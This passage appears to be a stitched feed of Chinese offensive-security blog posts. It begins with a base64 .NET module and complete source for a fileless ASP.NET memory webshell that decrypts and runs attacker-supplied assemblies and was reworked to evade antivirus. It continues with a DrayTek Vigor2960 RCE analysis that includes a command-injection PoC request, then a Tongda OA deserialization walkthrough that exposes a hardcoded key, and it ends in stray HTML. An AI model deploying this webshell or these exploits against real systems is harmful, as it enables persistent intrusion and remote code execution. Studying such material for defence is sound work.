EAABwATWkADwgAAAEbMAIARQAAAAYAABECewQAAAQlDCwmCHINAABwKCIAAAosGQJ7BQAABCgjAAAKA28mAAAKKCcAAAoKKwIDCt4PCwdvBwAACm8fAAAKCt4ABioAAAABEAAAAAAAADQ0AA8IAAABHgIoKAAACipCU0pCAQABAAAAAAAMAAAAdjIuMC41MDcyNwAAAAAFAGwAAAD0AgAAI34AAGADAABMAwAAI1N0cmluZ3MAAAAArAYAALwAAAAjVVMAaAcAABAAAAAjR1VJRAAAAHgHAABIAQAAI0Jsb2IAAAAAAAAAAgAAAVcVAggJAAAAAPoBMwAWAAABAAAAFQAAAAIAAAAGAAAABwAAAAYAAAAoAAAAAgAAAAYAAAABAAAAAQAAAAMAAAAAAAoAAQAAAAAABgAwACkACgBCADcACgBWADcABgDrAMsABgALAcsADgBYATkBBgB+ASkABgCMASkABgCoASkACgDBATcABgABAvcBBgAeAvcBBgA2AvcBBgA7AikABgBlAvcBBgCCAikABgCYAowCBgCwAikABgDLArYCBgDeAikABgAEA4wCAAAAAAEAAAAAAAEAAQABABAAFQAZAAUAAQABAAYATgATAAYAYwAXAAYAbAAbAAYAdAAbAAYAfAAbAAYAfwAbAFAgAAAAAMYAjAAeAAEAICEAAAAAhgCTACMAAgCwIQAAAACGAJwAKAADAIQiAAAAAIYApQAoAAQA1CIAAAAAhgC1ACgABQB4IwAAAACGALwAKAAGANwjAAAAAIYYxQAtAAcAAAABACkBAAABACkBAAABAPIBAAABAIgCAAABAPQCAAABAPQCIQDFADEAKQDFAC0AGQAtATYAEQBsATsAMQB1ASgAOQCFAUAAQQCWAUYAOQCFAUoAGQCiATYACQCtAVoASQC1AV8AUQDNAWYAUQDaAWsAUQDmAXAAWQDFADYAWQAPAn4AYQAtAkYAaQBEAoQAcQBVAigAOQBeAooAWQBuApEAeQB3ApcAOQBeApsAiQDFAC0AOQCmArkAkQDYAr8AoQDmAsYAoQBVAssAiQDtAtAAOQB3AtYACQBVAkYAkQDYAuAAOQCmAuUAOQD4AuoAqQANA/AAoQAZA/YAqQAqA/wAqQA0AwoBoQA9AxABCQDFAC0ALgALAB0BLgATACYBUQB1AKMA2gACARYBYwAEgAAAAAAAAAAAAAAAAAAAAAAZAAAAAgAAAAAAAAAAAAAAAQAgAAAAAAACAAAAAAAAAAAAAAAKADcAAAAAAAIAAAAAAAAAAAAAAAEAKQAAAAAAAAAAPE1vZHVsZT4ARk1fRGlyLmRsbABSdW4ARk1fRGlyAG1zY29ybGliAFN5c3RlbQBPYmplY3QAU3lzdGVtLldlYgBIdHRwUmVxdWVzdABSZXF1ZXN0AEh0dHBSZXNwb25zZQBSZXNwb25zZQBlbmNvZGVyAGRlY29kZXIAY3MAcmFuZG9tUHJlZml4AEVxdWFscwBwYXJzZU9iagBGaWxlVHJlZQBIZXhBc2NpaUNvbnZlcnQAZGVjb2RlAGFzb3V0cHV0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBvYmoAc2V0X0NoYXJzZXQAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0Zvcm0AZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABFeGNlcHRpb24AZ2V0X01lc3NhZ2UAV3JpdGUAVHlwZQBHZXRUeXBlAGdldF9Jc0FycmF5AEh0dHBDb250ZXh0AGdldF9SZXNwb25zZQBnZXRfUmVxdWVzdABnZXRfQ3VycmVudABwYXRoAFN5c3RlbS5JTwBEaXJlY3RvcnlJbmZvAEdldERpcmVjdG9yaWVzAEZpbGVTeXN0ZW1JbmZvAGdldF9OYW1lAEZpbGUARGF0ZVRpbWUAR2V0TGFzdFdyaXRlVGltZQBUb1N0cmluZwBGb3JtYXQARmlsZUluZm8AR2V0RmlsZXMAZ2V0X0xlbmd0aABJbnQ2NABoZXgAU3lzdGVtLlRleHQAU3RyaW5nQnVpbGRlcgBTdWJzdHJpbmcASW50MzIAU3lzdGVtLkdsb2JhbGl6YXRpb24ATnVtYmVyU3R5bGVzAFBhcnNlAENvbnZlcnQAVG9DaGFyAEFwcGVuZABzcmMAb3BfRXF1YWxpdHkARW5jb2RpbmcAR2V0RW5jb2RpbmcARnJvbUJhc2U2NFN0cmluZwBHZXRTdH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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAAA9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="; byte[] Asbyte = Convert.FromBase64String(Asstring); StreamWriter sw = new StreamWriter(@"dir.dll"); sw.BaseStream.Write(Asbyte, 0, Asbyte.Length); sw.Close(); } }}

使用dnspy逆向看下代码,找到多了一层base64的原因

然而最后致命错误居然是byte[]转string结尾会有\00字符，所以字节长度不正确，base64报错，需在结尾去除

可以对比下删除和不删除情况下string的length就可以看到

var res = utf8.GetString(plainBytes).TrimEnd('\0').TrimEnd(null);

同时开始着手修改返回包加密，找到蚁剑aspxcsharp项目的payload（https://github.com/AntSwordProject/AntSword-Csharp-Template）

可以在源码中看到输出在asoutput方法中，直接修改try中的功能代码

同时在开头加入模块引用

使用项目的build脚本编译，将编译成功的dist文件夹中的文件替换掉antSword-master\antSword-master\source\core\aspxcsharp\template中的文件，重启蚁剑

修改成功如下

VirtualPath

实际使用中发现报错，但哥斯拉派生的内存马可以但是会被杀，逆向dll发现使用virtualpath的方式，并存在通过反射绕过frendlyurl和预编译代码

于是根据据实际环境修改内存马如下

<%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><%@ Import Namespace="System.Security.Cryptography" %><%@ Import Namespace="System.Web.Hosting" %>"server" language="c#">    public void Page_load()    {        var buildManagerType = typeof(System.Web.Compilation.BuildManager);        var debugProp = buildManagerType.GetProperty("DebuggingEnabled",            System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);        Console.WriteLine(debugProp);        if (debugProp != null)        {            debugProp.SetValue(null, true);        }        HostingEnvironment.RegisterVirtualPathProvider(new MyVirtualPathProvider());    }    public class MyVirtualPathProvider : VirtualPathProvider    {        public override string GetCacheKey(string virtualPath)        {            try            {                HttpContext context = HttpContext.Current;                String Payload = context.Request.Form["ant"];                if (Payload != null)                {                    string aesKey = "ewtk7fiw26osz2gi";                    var utf8 = new UTF8Encoding();                    var b64Dec = new FromBase64Transform();                    var aes = new RijndaelManaged();                    aes.Padding = (PaddingMode)3;                    aes.KeySize = 128;                    var aesKeyBytes = utf8.GetBytes(aesKey);                    aes.IV = aesKeyBytes;                    var cipherBytes = b64Dec.TransformFinalBlock((utf8.GetBytes(Payload)), 0, utf8.GetBytes(Payload).Length);                    var aesDec = aes.CreateDecryptor((aesKeyBytes), (aes.IV));                    var plainBytes = aesDec.TransformFinalBlock(cipherBytes, 0, cipherBytes.Length);                    var res = utf8.GetString(plainBytes).TrimEnd('\0').TrimEnd(null);                    int test1 = res.Length;                    System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(res));                    assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(context);                    context.Response.End();                }                            }            catch (Exception e)            {                Console.WriteLine(e);            }            return Previous.GetCacheKey(virtualPath);        }        public override bool FileExists(string virtualPath)        {            virtualPath = virtualPath.ToLower();            if (virtualPath.Contains("indexcc"))            {                return true;            }            else            {                return Previous.FileExists(virtualPath);            }            //return base.FileExists(virtualPath);        }        public override VirtualFile GetFile(string virtualPath)        {            virtualPath = virtualPath.ToLower();            if (virtualPath.Contains("indexcc"))            {                return new MyVirtualFile(virtualPath);            }            else            {                return Previous.GetFile(virtualPath);            }            //return base.GetFile(virtualPath);        }    }    public class MyVirtualFile : VirtualFile    {        private string myPath;        public MyVirtualFile(string virtualPath)            : base(virtualPath)        {            myPath = virtualPath;        }        public override Stream Open()        {            Stream stream = new MemoryStream();            return stream;        }    }

参考文章

https://yzddmr6.com/archives/ 蚁剑作者

http://www.zcgonvh.com/post/analysis_of_CVE-2020-17144_and_to_weaponizing.html 头像哥博客 listener

https://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483945&idx=1&sn=f4ad81298b17f2925c95ea1d69edede9&chksm=c2b1005ff5c68949da993b44f4d9f3c1d070673c1b08130edc008e27bd10e2ed718c889604c4&scene=21#wechat_redirect

腾讯AD实验室 listener

https://paper.seebug.org/1386/ ViewState

https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/ ViewState

https://devco.re/blog/2020/04/21/from-sql-to-rce-exploit-aspnet-app-with-sessionstate/ sessionstate

https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html#devco-blog ViewState

http://paper.vulsee.com/KCon/2021/%E9%AB%98%E7%BA%A7%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E4%B8%8B%E7%9A%84Webshell.pdf virtualPath

https://y4er.com/posts/aspnet-getshell-tips/ appcmd

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8%E8%99%9A%E6%8B%9F%E6%96%87%E4%BB%B6%E9%9A%90%E8%97%8FASP.NET-Webshell VirtualPathProvider

https://www.crisprx.top/archives/547 filter

https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html viewstate

https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys viewstate

阅读原文

跳转微信打开

某路由器RCE漏洞分析

Sat, 14 Oct 2023 18:30:00 +0800

原创侠盗鲁平 2023-10-14 18:30 中国香港

下载地址

https://fw.draytek.com.tw/Vigor2960/Firmware/

使用手册

https://support.formosa.no/DrayTek/Downloads/Vigor2960/Manual/Vigor2960%20%E7%B3%BB%E5%88%97%E4%BD%BF%E7%94%A8%E6%89%8B%E5%86%8A%20V2.1.pdf

厂商漏洞列表

https://www.draytek.com/about/security-advisory

架构

根据漏洞通告表述为MIPS架构，可通过qemu的system模式搭建模拟系统实际bin下执行文件镜像为arm小端elf文件，拿到shell上传工具需注意平台文件格斯

环境搭建失败

尝试搭建环境但是失败

UBI文件格式镜像打包文件

 ubireader_extract_images Vigor2960_v1.4.1.all

解包释放镜像

ubireader_extract_files Vigor2960_v1.4.1.all

解包释放文件

#配置网络，创建网桥sudo apt-get install bridge-utilssudo brctl addbr Virbr0sudo ifconfig Virbr0 192.168.10.1/24 up #创建tap接口，添加到网桥sudo apt install uml-utilitiessudo tunctl -t tap0sudo ifconfig tap0 192.168.10.11/24 upsudo brctl addif Virbr0 tapsudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic#进入虚拟机后，配置ip地址，测试与主机的连通性ifconfig eth0 192.168.10.2/24 upping 192.168.10.1 -c 10 #回到主机中将squashfs-root文件夹复制到虚拟机scp -r ubifs-root/ root@192.168.10.2:~/mount -o bind /dev ./ubifs-root/devmount -o bind /proc ./ubifs-root/procssh root@192.168.10.2chroot squashfs-root /bin/sh接着启动web服务成功，但未找到vpn全部启动脚本，仅搭建http服务没有任何意义

漏洞

CVE-2020-8515

版本要求

version<1.5.1

https://cn-sec.com/archives/1423548.html

https://www.secpulse.com/archives/166775.html

https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/

反编译main函数，找到action参数的处理函数

跟进subB3E0

对照off_41408

过check函数然后v40和openssl拼接

popen执行命令

poc

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-14472

版本要求

version<1.5.1.1

https://nosec.org/home/detail/4631.html

https://bestwing.me/drayteck-vigor-vulnerability-disclosure.html

全poc

https://github.com/Cossack9989/Vulns/blob/d9f9fad0e967859cc119a9d3c31e90adc17c655f/IoT/CVE-2020-14472.md?plain=1#L4

CVE-2020-15415

在1.5.1版本下，当访问cgi-bin/mainfunction.cgi/cvmcfgupload这个路径时，如果content type为text/x-python-script，则在filename中存在命令注入。

跟进sub_12F24

命令拼接触发点如下

poc

POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1Host: xxx.xxx.xxx.xxx:xxxxContent-Length: 174Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh,en;q=0.9,zh-CN;q=0.8,la;q=0.7Connection: close------WebKitFormBoundary`Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"`Content-Type: text/x-python-script`------WebKitFormBoundary--`

[无真实poc]CVE-2020-19664

https://github.com/peanuts62/bug_poc

[无poc]CNVD-2021-28718

DrayTek Vigor2960 1.5.1.2

[无poc]CNVD-2021-28719

DrayTek Vigor2960 1.5.1.2

[无poc]CVE-2021-43118

- END -

阅读原文

跳转微信打开

通达OA <12.4 反序列化漏洞分析

Fri, 13 Oct 2023 17:03:00 +0800

原创 aspir1ng 2023-10-13 17:03 北京

通达OA < 12.4 反序列化漏洞分析

0x00 前置知识和准备

1.yii版本和源码准备

查看通达oa 11.10使用的yii框架版本是

2.0.13-dev

，该版本在

inc/vendor/yii2/yiisoft/yii2/BaseYii.php

（

yii/BaseYii

）的

getVersion

方法可以查看。由于通达oa解密后的代码会对yii框架部分代码有影响，会出现乱码的情况，所以建议找到对应版本后上yii仓库下载源码。

static public function getVersion() {  return "2.0.13-dev"; }

2.yii csrftoken配置方法

单个controller开启：

在控制器中设置

public $enableCsrfValidation = true;

全局开启：

在yii框架的

/config/main.php

设置

request => [    'enableCookieValidation' => true,]

yii框架默认是开启这个设置的。

针对提交的数据流进行设置

通达oa在

inc/vendor/yii2/yiisoft/yii2/web/Request.php

页面中，设置

public $enableCsrfValidation = true;$enableCsrfValidation = true;

（默认）

还可以设置beforeAction在某些方法之前进行csrf token、afterAction在某些方法之后进行csrf token、表单设置、ajax异步post请求设置，这些其他模式设置csrf token请查看《Yii2 关闭和打开csrf 验证》。

3.yii csrftoken http报文格式

Cookie中_csrf的参数，格式大致如下：

Cookie: _csrf=[0-9a-zA-Z]a:2:{i:0;s:5:"_csrf";i:1;s:32:"[0-9a-zA-Z]"}

a开始就是序列化的数组数据。

例如：

Cookie: _csrf=1e21c37c4e981a0a44b6ae2c6af5f73007458c445682db139b040fc8262a9266a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22brBzjgY3PLWqhQtyweObnwZg74YP17Fn%22%3B%7D;

通过这些可以看到该漏洞的利用条件如下：

yii csrf token开启（默认开启）
只能影响到yii框架函数request类请求的数据流，php原生请求方式不受影响。

0x01 漏洞分析

1.反序列化触发点csrfMetaTags

yii框架csrf token生成的时候会生成一部分序列化数据，校验该token需要对这部分序列化数据进行反序列化校验。

yii/helpers/BaseHtml

的

csrfMetaTags

方法是生成csrftoken后将其放在html的meta标签里面的方法。yii默认是开启csrf校验的，所以

$request->enableCsrfValidation

默认为true，默认就会调用

yii/web/Request::getCsrfToken

方法获取csrf token。

public static function csrfMetaTags()    {        $request = Yii::$app->getRequest();        // $request是framework/web/Request.php Request类        if ($request instanceof Request && $request->enableCsrfValidation) {            return static::tag('meta', '', ['name' => 'csrf-param', 'content' => $request->csrfParam]) . "\n    "                . static::tag('meta', '', ['name' => 'csrf-token', 'content' => $request->getCsrfToken()]) . "\n";        }        return '';    }//framework/web/Request.php public $enableCsrfValidation = true;

跟进

getCsrfToken

方法，

$this->_csrfToken

可控，设置为null，从而能继续进入

$this->loadCsrfToken()

。

public function getCsrfToken($regenerate = false)    {        //可设置 $this->_csrfToken = null        if ($this->_csrfToken === null || $regenerate) {            if ($regenerate || ($token = $this->loadCsrfToken()) === null)            {                $token = $this->generateCsrfToken();            }            $this->_csrfToken = Yii::$app->security->maskToken($token);        }        return $this->_csrfToken;    }

$this->loadCsrfToken()

由于

$this->enableCsrfCookie

默认就为

true

，就会调用

getCookies

方法。

$this->_cookies

可控，从而调用

$this->loadCookies()

。

loadCookies

方法中

$this->cookieValidationKey

根据手册开启csrf校验该密钥可以在yii web配置里查看。通达oa中yii的web配置文件是

general/appbuilder/config/web.php

，在这里面可以看到固定密码为

tdide2

。

protected function loadCsrfToken()    {        //默认或可设置$enableCsrfCookie = true        if ($this->enableCsrfCookie) {            return $this->getCookies()->getValue($this->csrfParam);        }        return Yii::$app->getSession()->get($this->csrfParam);    }public function getCookies()    {        if ($this->_cookies === null) {            $this->_cookies = new CookieCollection($this->loadCookies(), [                'readOnly' => true,            ]);        }        return $this->_cookies;    }protected function loadCookies()    {        $cookies = [];        if ($this->enableCookieValidation) {            if ($this->cookieValidationKey == '') {                throw new InvalidConfigException(get_class($this) . '::cookieValidationKey must be configured with a secret key.');            }            foreach ($_COOKIE as $name => $value) {                if (!is_string($value)) {                    continue;                }              //$this->cookieValidationKey = 'tdide2'                $data = Yii::$app->getSecurity()->validateData($value, $this->cookieValidationKey);                if ($data === false) {                    continue;                }              // 反序列化点                $data = @unserialize($data);                if (is_array($data) && isset($data[0], $data[1]) && $data[0] === $name) {                    $cookies[$name] = Yii::createObject([                        'class' => 'yii\web\Cookie',                        'name' => $name,                        'value' => $data[1],                        'expire' => null,                    ]);                }            }        ......

回到

loadCookies

中，对

$_COOKIE

循环遍历并对cookie中每个字段的值用

Yii::$app->getSecurity()->validateData()

校验，校验csrf token值无问题后对其进行反序列化。

跟进发现是

yii/base/Security

的

validataData

方法。该方法校验思路是比对cookie的csrf token中传入的hash和代码中重新计算的hash是否一致。

hash_hmac

设置的是

sha256

位的hash计算模式，因此每次传入csrf token都要计算对应的hash值。

public function validateData($data, $key, $rawHash = false)    {        //$this->macHash = sha256        $test = @hash_hmac($this->macHash, '', '', $rawHash);        if (!$test) {            throw new InvalidConfigException('Failed to generate HMAC with hash algorithm: ' . $this->macHash);        }        $hashLength = StringHelper::byteLength($test);        if (StringHelper::byteLength($data) >= $hashLength) {            $hash = StringHelper::byteSubstr($data, 0, $hashLength);            $pureData = StringHelper::byteSubstr($data, $hashLength, null);            //hash_mac('sha256',$pureData,'tdide2',false)            $calculatedHash = hash_hmac($this->macHash, $pureData, $key, $rawHash);            if ($this->compareString($hash, $calculatedHash)) {                return $pureData;            }        }        return false;    }

2.通达OA调用csrfMetaTags的地方

分析完了反序列化unserialize的触发点，但还要找到调用

csrfMetaTags

方法的地方。由于

yii/web/Request::csrfMetaTags

是生成html页面meta标签的csrf token，因此调用的地方一般在html模版或者写页面的方法中。全局搜索，在

general/appbuilder/views/layouts/main.php

中有调用该方法。

$this->beginPage();echo "\n;echo Yii::$app->language;echo "\">\n\n    ;echo Yii::$app->charset;echo "\">\n    \n    ";echo yii\helpers\Html::csrfMetaTags();echo "    "</span>;......</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">查看<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">/general/appbuilder/</p>目录结构发现<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">general/appbuilder/views/</p>是yii框架写的模板主页面。只要调用了该路由下的方法就能触发模板渲染。</div><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">根据手册，<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">general/appbuilder/config/params.php</p>是配置框架参数的，其中<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">skip_module</p>是配置不进行鉴权的模块，其中就有<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">portal</p>门户模块。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #61aeee;line-height: 26px;"><?php</span><span style="color: #c678dd;line-height: 26px;">include_once</span> <span style="color: #98c379;line-height: 26px;">"inc/td_config.php"</span>;$arr_mysql_server = explode(<span style="color: #98c379;line-height: 26px;">":"</span>, TD::$_arr_db_master[<span style="color: #98c379;line-height: 26px;">"host"</span>]);<span style="color: #c678dd;line-height: 26px;">return</span> <span style="color: #c678dd;line-height: 26px;">array</span>(...... <span style="color: #98c379;line-height: 26px;">"skip_module"</span>           => <span style="color: #c678dd;line-height: 26px;">array</span>(<span style="color: #98c379;line-height: 26px;">"portal"</span>, <span style="color: #98c379;line-height: 26px;">"hr"</span>, <span style="color: #98c379;line-height: 26px;">"meeting"</span>, <span style="color: #98c379;line-height: 26px;">"formCenter"</span>, <span style="color: #98c379;line-height: 26px;">"calendar"</span>, <span style="color: #98c379;line-height: 26px;">"officeproduct"</span>, <span style="color: #98c379;line-height: 26px;">"invoice"</span>),</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">同时<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">general/appbuilder/web/index.php</p>是yii路由入口，获取请求路径后以问号为分隔符substr分割路径和uri参数。<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">portal</p>模块下不是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">gateway、/gateway/saveportal、edit、uploadfile、uploadportalfile、uploadpicture、dologin</p>的话会直接跳转到<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: 